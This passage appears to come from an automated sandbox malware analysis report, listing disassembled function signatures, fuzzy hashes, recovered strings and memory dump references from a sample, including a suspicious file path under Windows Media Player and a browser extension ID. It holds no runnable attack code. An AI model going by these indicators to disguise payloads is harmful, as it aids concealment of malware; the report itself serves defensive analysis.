                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Bad escape sequence in string$Empty escape sequence in string
                                                                                                                                                                          • API String ID: 0-928816353
                                                                                                                                                                          • Opcode ID: 4839d7d4b103d010759f828f1e26a556bcb70bee1eced7327b0ca9b5a3e41859
                                                                                                                                                                          • Instruction ID: 871f6dab02bbd5733a2243d32e60b4c970ef29dfc1e0fd396aae23ad10775cfa
                                                                                                                                                                          • Opcode Fuzzy Hash: 4839d7d4b103d010759f828f1e26a556bcb70bee1eced7327b0ca9b5a3e41859
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D812133A0A78196EB08AB29D441B7DF761EB51BD4F958232DB9D03BB5CE2CD085C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __except_validate_context_record
                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                          • API String ID: 1467352782-3733052814
                                                                                                                                                                          • Opcode ID: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
                                                                                                                                                                          • Instruction ID: a5fe8cfd3119b283f25ad4ab6aa0f335f397c4d5d1ac2e7179e79d672080d546
                                                                                                                                                                          • Opcode Fuzzy Hash: c41babcde769611a9ebafd1821e8d1a95b947c620c220eb6377b327e93ce6598
                                                                                                                                                                          • Instruction Fuzzy Hash: E871E57290A68186DB60AF19D158B7DFBA2FB00B84F958175DE8C07AB9CF3CD651C720
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 73155330-3916222277
                                                                                                                                                                          • Opcode ID: d461e40776a2a26607069f8d8847df8d43bc6a2efcbe0d367d14b911a9a900f9
                                                                                                                                                                          • Instruction ID: b0223f5efbbc9057c078ba175a1c5fad3e10265dbcdd5bab06ee44cd4f0f0df7
                                                                                                                                                                          • Opcode Fuzzy Hash: d461e40776a2a26607069f8d8847df8d43bc6a2efcbe0d367d14b911a9a900f9
                                                                                                                                                                          • Instruction Fuzzy Hash: 31518C32709B4596EB15EF2AE05426DB7A0FB88B90F854531DB4D57BB0CF38E0A1C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: $in Json::Value::getMemberNames(), value must be objectValue
                                                                                                                                                                          • API String ID: 3668304517-828478770
                                                                                                                                                                          • Opcode ID: fcad06121cb427b66d7428271699ca92353f82652a11d40ff8b1f23b940c495e
                                                                                                                                                                          • Instruction ID: 77f520a8faae386927dd41a6bbed550bcf0089fbc635390dbffc8e77348ca8a0
                                                                                                                                                                          • Opcode Fuzzy Hash: fcad06121cb427b66d7428271699ca92353f82652a11d40ff8b1f23b940c495e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0851C772919B8581EA10EB18E4405AEE361FBC5BD4FD15232E69D03AB5DF7CE494CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • additional six characters expected to parse unicode surrogate pair., xrefs: 00007FF7ABC30DB2
                                                                                                                                                                          • expecting another \u token to begin the second half of a unicode surrogate pair, xrefs: 00007FF7ABC30E95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: additional six characters expected to parse unicode surrogate pair.$expecting another \u token to begin the second half of a unicode surrogate pair
                                                                                                                                                                          • API String ID: 3668304517-1961466578
                                                                                                                                                                          • Opcode ID: 513d0a1c3b93cbef55f5ce4d2acb5fd99c13a7cb91e6d9e34a0cd819b1abd28e
                                                                                                                                                                          • Instruction ID: 653f2a7c3589252ee290b2c88b2af6ad7a496fbcefcde40eeb0a4ccdab017f5e
                                                                                                                                                                          • Opcode Fuzzy Hash: 513d0a1c3b93cbef55f5ce4d2acb5fd99c13a7cb91e6d9e34a0cd819b1abd28e
                                                                                                                                                                          • Instruction Fuzzy Hash: B9412963A1978651EA189B29D440B79E350EB997D0FC05231FADD037FADE3CE1859310
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: egjidjbpglichdcondbcbdnbeeppgdph
                                                                                                                                                                          • API String ID: 73155330-1098953746
                                                                                                                                                                          • Opcode ID: 1a67e18a9366aa1060cfc313c095b9b362e2404cc651c07e127085b65488f072
                                                                                                                                                                          • Instruction ID: ffcb37995ec6e194ea1995fae787a2e0fecf9e474187223521297ec31aa204ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a67e18a9366aa1060cfc313c095b9b362e2404cc651c07e127085b65488f072
                                                                                                                                                                          • Instruction Fuzzy Hash: DE41BD66B1AA9192EA10BB19D00467DA290BB48BE4FD60731DF7C47BF8EE7CD051C320
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                          • String ID: ?
                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                          • Opcode ID: be00a9dea23bf6a1188b66e376131877ecdf6e27db4d46faeb8b136f3d777bd6
                                                                                                                                                                          • Instruction ID: 80dd66a22300594f8c5b31b9c9e3e9dcc35081f20a1a6cf439ed3ec323d95956
                                                                                                                                                                          • Opcode Fuzzy Hash: be00a9dea23bf6a1188b66e376131877ecdf6e27db4d46faeb8b136f3d777bd6
                                                                                                                                                                          • Instruction Fuzzy Hash: 16412B22A0A38251FB60AB29A481F7AE660EF80BA4F914335EF5D07AF5DF3CD451C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 2558813199-1018135373
                                                                                                                                                                          • Opcode ID: bba117021f344cf8f4e789ab315634a830666d67b1e2a12394e23247ba1d153d
                                                                                                                                                                          • Instruction ID: 3031c0e938228c9a657672740a0125c946fd788fcc82cbc834a658809356eeeb
                                                                                                                                                                          • Opcode Fuzzy Hash: bba117021f344cf8f4e789ab315634a830666d67b1e2a12394e23247ba1d153d
                                                                                                                                                                          • Instruction Fuzzy Hash: 7251C07260A74187EA20EB69E04466DBBB5F788B90F511935DB8D07B76CF3CE161CB20
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • Bad unicode escape sequence in string: hexadecimal digit expected., xrefs: 00007FF7ABC3103D
                                                                                                                                                                          • Bad unicode escape sequence in string: four digits expected., xrefs: 00007FF7ABC30F60
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Bad unicode escape sequence in string: four digits expected.$Bad unicode escape sequence in string: hexadecimal digit expected.
                                                                                                                                                                          • API String ID: 3668304517-3825735986
                                                                                                                                                                          • Opcode ID: 3b96ca3ed2c645b18e49e253127e488c662b08a6fc5aa7bde1f60e7d962cfe14
                                                                                                                                                                          • Instruction ID: fbb90929a38117ba87ef87b95c9fdcd31879eaa5400295e096db3615ee2c557c
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b96ca3ed2c645b18e49e253127e488c662b08a6fc5aa7bde1f60e7d962cfe14
                                                                                                                                                                          • Instruction Fuzzy Hash: A04167A3E196C441EA14EB29D401BBDE351AB897E4FC15331FA6D437F9EE2CE2858710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                          • String ID: U
                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                          • Opcode ID: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
                                                                                                                                                                          • Instruction ID: e6ae71f64a76397e212b809feb99d610a9491d122857468e786710dd6a59cf94
                                                                                                                                                                          • Opcode Fuzzy Hash: 26407c493de7ae598b61e49771dd347e6341eebb60b6796b06b6e28fe12133ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E41E562B1AB5186DB109F29E844BB9A7A1FB88B84F814132EE4D87774EF7CD481C750
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                          • API String ID: 729085983-410509341
                                                                                                                                                                          • Opcode ID: 7856f3795aebfd0e8b5d61ff23763f898477f6cc05ae6a465f12707c2bb4ec42
                                                                                                                                                                          • Instruction ID: d752b4615909ba3ecd6d95e84dc4036670a4d25e5472044b27f7ccaadb1dd4b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 7856f3795aebfd0e8b5d61ff23763f898477f6cc05ae6a465f12707c2bb4ec42
                                                                                                                                                                          • Instruction Fuzzy Hash: 99110862B1BB0595EB04BB29E448BAD7391DF487A4F810631EA2C473F6DE7CD480C351
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                          • API String ID: 1838369231-1405518554
                                                                                                                                                                          • Opcode ID: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
                                                                                                                                                                          • Instruction ID: 925c0969d6c2ec62816e5682330eb8201cf88f1f8e97f1a31bf5e61bdab11793
                                                                                                                                                                          • Opcode Fuzzy Hash: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
                                                                                                                                                                          • Instruction Fuzzy Hash: 7301A723206B81CAC748EF79A840158B7A5FB58B88B545135CA8C8372AEF34C490C350
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                          • API String ID: 729085983-410509341
                                                                                                                                                                          • Opcode ID: 3a77e4a1c4750c989717916d7749886f1baedb1c4842d737a8bb0566699bff25
                                                                                                                                                                          • Instruction ID: 584ece039ca8e6956da3144d0cbfef2cb6a197bef495cbb35eec6cb0a76fe3fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 3a77e4a1c4750c989717916d7749886f1baedb1c4842d737a8bb0566699bff25
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D11C662A16B8584EB15BB28D855BAC7391EB44BA4F810131D96D0B7F6EF3CD680C350
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7ABC3EEE6), ref: 00007FF7ABC44A10
                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7ABC3EEE6), ref: 00007FF7ABC44A51
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                          • Opcode ID: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
                                                                                                                                                                          • Instruction ID: e55331ad07d1cd5100598be27fd2c924717d49a581f678d08d9808f4dcfcf4a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E116032619B8182EB619F19F444669B7E5FB88B84F694234EE8D07778DF3CC551CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • __std_fs_code_page.LIBCPMT ref: 00007FF7ABC22C2E
                                                                                                                                                                            • Part of subcall function 00007FF7ABC3E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7ABC03F96), ref: 00007FF7ABC3E0C6
                                                                                                                                                                            • Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03B25
                                                                                                                                                                            • Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03BCA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
                                                                                                                                                                          • String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$G
                                                                                                                                                                          • API String ID: 1377543553-4099582714
                                                                                                                                                                          • Opcode ID: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
                                                                                                                                                                          • Instruction ID: 5da7c0c446dd64657d15d9e0660f61bf0ef45daff0b39c881b5f24aa9e64cae0
                                                                                                                                                                          • Opcode Fuzzy Hash: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
                                                                                                                                                                          • Instruction Fuzzy Hash: 50E04861A197C682D620AB14A4017A5D354FBCC308F440230DFCC06775DF3CD3858B54
                                                                                                                                                                          APIs
                                                                                                                                                                          • __std_fs_code_page.LIBCPMT ref: 00007FF7ABC22BDE
                                                                                                                                                                            • Part of subcall function 00007FF7ABC3E0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7ABC03F96), ref: 00007FF7ABC3E0C6
                                                                                                                                                                            • Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03B25
                                                                                                                                                                            • Part of subcall function 00007FF7ABC03AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF7ABC03BCA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
                                                                                                                                                                          • String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$J
                                                                                                                                                                          • API String ID: 1377543553-1822051254
                                                                                                                                                                          • Opcode ID: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
                                                                                                                                                                          • Instruction ID: 2e6bea00d099abbbca007825c9aa9ce8d932c43fb65b8c609dde799ae12179fc
                                                                                                                                                                          • Opcode Fuzzy Hash: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
                                                                                                                                                                          • Instruction Fuzzy Hash: 8DE04F52A1978682EA20AB18A4017AAE364FBCD308F840230EECC06775EF3CD3858B54

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:1.5%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:512
                                                                                                                                                                          Total number of Limit Nodes:3
